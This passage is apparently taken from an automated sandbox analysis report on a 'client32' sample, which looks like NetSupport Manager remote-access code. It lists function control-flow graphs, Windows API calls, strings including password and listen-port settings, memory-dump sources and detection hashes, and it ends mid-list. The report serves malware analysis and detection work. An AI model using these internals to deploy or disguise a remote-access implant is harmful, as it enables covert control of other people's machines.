                                                                                                control_flow_graph 3210 69cf6ba0-69cf6c14 call 69d04710 call 69ce5e90 GetTickCount call 69cf9210 3217 69cf6c1a-69cf6c1c 3210->3217 3218 69cf6fb9-69cf6fc9 call 69d028e1 3210->3218 3220 69cf6c26-69cf6c33 GetTickCount 3217->3220 3221 69cf6c35-69cf6c3d call 69cf6940 3220->3221 3222 69cf6c42-69cf6c49 3220->3222 3221->3222 3225 69cf6c4b call 69ce97c0 3222->3225 3226 69cf6c50-69cf6c57 3222->3226 3225->3226 3228 69cf6c59-69cf6c61 Sleep 3226->3228 3229 69cf6c66-69cf6c6d 3226->3229 3230 69cf6f97-69cf6f9e 3228->3230 3231 69cf6c6f-69cf6c7c WaitForSingleObject 3229->3231 3232 69cf6c82-69cf6cc2 call 69d03c10 select 3229->3232 3233 69cf6fa4-69cf6fb6 call 69d028e1 3230->3233 3234 69cf6c20 3230->3234 3231->3232 3232->3233 3239 69cf6cc8-69cf6ccb 3232->3239 3234->3220 3240 69cf6ccd-69cf6cdf Sleep 3239->3240 3241 69cf6ce4-69cf6ce6 3239->3241 3240->3230 3241->3220 3242 69cf6cec-69cf6cf9 GetTickCount 3241->3242 3243 69cf6d00-69cf6d1c 3242->3243 3244 69cf6f89-69cf6f91 3243->3244 3245 69cf6d22 3243->3245 3244->3230 3244->3243 3246 69cf6d28-69cf6d2b 3245->3246 3247 69cf6d3d-69cf6d45 3246->3247 3248 69cf6d2d-69cf6d36 3246->3248 3247->3244 3250 69cf6d4b-69cf6d95 _calloc call 69ce5c90 3247->3250 3248->3246 3249 69cf6d38 3248->3249 3249->3244 3253 69cf6f4f-69cf6f7c GetTickCount InterlockedExchange call 69cf77e0 3250->3253 3254 69cf6d9b 3250->3254 3253->3230 3259 69cf6f7e-69cf6f83 3253->3259 3255 69cf6dac-69cf6ded call 69ce9310 3254->3255 3261 69cf6f3a-69cf6f46 call 69ce30a0 3255->3261 3262 69cf6df3-69cf6e58 GetTickCount InterlockedExchange _calloc call 69d03c10 3255->3262 3259->3244 3269 69cf6f47-69cf6f4c call 69cea4e0 3261->3269 3267 69cf6e8b-69cf6e99 call 69cf28d0 3262->3267 3268 69cf6e5a-69cf6e5b 3262->3268 3276 69cf6e9e-69cf6ea4 3267->3276 3270 69cf6e5d-69cf6e74 call 69ce6f50 3268->3270 3271 69cf6e76-69cf6e89 call 69ce94e0 3268->3271 3269->3253 3280 69cf6ea7-69cf6ebd call 69cf77e0 3270->3280 3271->3276 3276->3280 3283 69cf6ebf-69cf6f1d InterlockedDecrement SetEvent call 69d031a0 call 69ce5c90 3280->3283 3284 69cf6f25-69cf6f38 call 69ce30a0 3280->3284 3291 69cf6f23 3283->3291 3292 69cf6da0-69cf6da6 3283->3292 3284->3269 3291->3253 3292->3255
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6BD5
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6C26
                                                                                                • Sleep.KERNEL32(00000064), ref: 69CF6C5B
                                                                                                  • Part of subcall function 69CF6940: GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                • WaitForSingleObject.KERNEL32(00000180,?), ref: 69CF6C7C
                                                                                                • _memmove.LIBCMT ref: 69CF6C93
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 69CF6CB4
                                                                                                • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 69CF6CD9
                                                                                                • GetTickCount.KERNEL32(00000000,?,00000000,00000000,?), ref: 69CF6CEC
                                                                                                • _calloc.LIBCMT ref: 69CF6D76
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,00001001,00000001), ref: 69CF6DF3
                                                                                                • InterlockedExchange.KERNEL32(02EF3002,00000000,?,?,?,?,?,?,?,?,00001001,00000001), ref: 69CF6E01
                                                                                                • _calloc.LIBCMT ref: 69CF6E33
                                                                                                • _memmove.LIBCMT ref: 69CF6E47
                                                                                                • InterlockedDecrement.KERNEL32(02EF2FAA), ref: 69CF6EC3
                                                                                                • SetEvent.KERNEL32(0000017C), ref: 69CF6ECF
                                                                                                • _memmove.LIBCMT ref: 69CF6EF4
                                                                                                • GetTickCount.KERNEL32(?,?,?,00001001,00000001), ref: 69CF6F4F
                                                                                                • InterlockedExchange.KERNEL32(02EF2F4A,-69D2A188,?,?,?,00001001,00000001), ref: 69CF6F60
                                                                                                Strings
                                                                                                • httprecv, xrefs: 69CF6BDD
                                                                                                • ReadMessage returned FALSE. Terminating connection, xrefs: 69CF6F3A
                                                                                                • ResumeTimeout, xrefs: 69CF6BBA
                                                                                                • FALSE, xrefs: 69CF6E67
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 69CF6E62
                                                                                                • ProcessMessage returned FALSE. Terminating connection, xrefs: 69CF6F25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                • API String ID: 1449423504-919941520
                                                                                                • Opcode ID: f922673b3debe78f11c738c8105b6805802481b3f32716e60311d972434c3b7f
                                                                                                • Instruction ID: c0843d0d57c77f2d7f313081144fd6c5245af22f3898ad1b1f05c302927c81c5
                                                                                                • Opcode Fuzzy Hash: f922673b3debe78f11c738c8105b6805802481b3f32716e60311d972434c3b7f
                                                                                                • Instruction Fuzzy Hash: 85B182B5D002989BEF60CF64DE44BD9B3B4BF49348F0080E5E649A7240E7B59AC5CF91
                                                                                                Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32 ref: 11030F12
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11031037
                                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                                • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 1620732580-3468083601
                                                                                                • Opcode ID: 9863e0e3a0b7f722b0f310aa32cc767fca6cb2d11c64d482dc9f47db344ef0a9
                                                                                                • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                                • Opcode Fuzzy Hash: 9863e0e3a0b7f722b0f310aa32cc767fca6cb2d11c64d482dc9f47db344ef0a9
                                                                                                • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                                                Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086A5C
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AEC
                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AFD
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B0E
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B1F
                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks,?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B30
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                • API String ID: 2201880244-3035937465
                                                                                                • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                                • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                                Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 3535843008-1834795898
                                                                                                • Opcode ID: 86e3237ac1b9745dddb818f0af342d18f4e431cd4f62cb372250aaa284631697
                                                                                                • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                                • Opcode Fuzzy Hash: 86e3237ac1b9745dddb818f0af342d18f4e431cd4f62cb372250aaa284631697
                                                                                                • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                                                Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11074F43
                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                • API String ID: 703120326-1497550179
                                                                                                • Opcode ID: e4688f8407387d4bab8328f3f562448c3a4dbf4e24967312636c9c29056ca376
                                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                                • Opcode Fuzzy Hash: e4688f8407387d4bab8328f3f562448c3a4dbf4e24967312636c9c29056ca376
                                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                                Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                • PostMessageA.USER32 ref: 11139C4F
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SetWindowTextA.USER32(000103BC,00000000), ref: 11139CF7
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139DBC
                                                                                                • GetForegroundWindow.USER32 ref: 11139DDC
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139DEA
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139E27
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139E78
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139E85
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139E99
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139DFF
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,00000000), ref: 11132144
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139EAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                • API String ID: 3453649892-3803836183
                                                                                                • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                                • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                                Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostwsprintf
                                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                                • API String ID: 875889313-3431570279
                                                                                                • Opcode ID: be877120142608fca6c2531b68b122bc3badda3df7e1b5234fba37ed4ecb06df
                                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                                • Opcode Fuzzy Hash: be877120142608fca6c2531b68b122bc3badda3df7e1b5234fba37ed4ecb06df
                                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                                Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
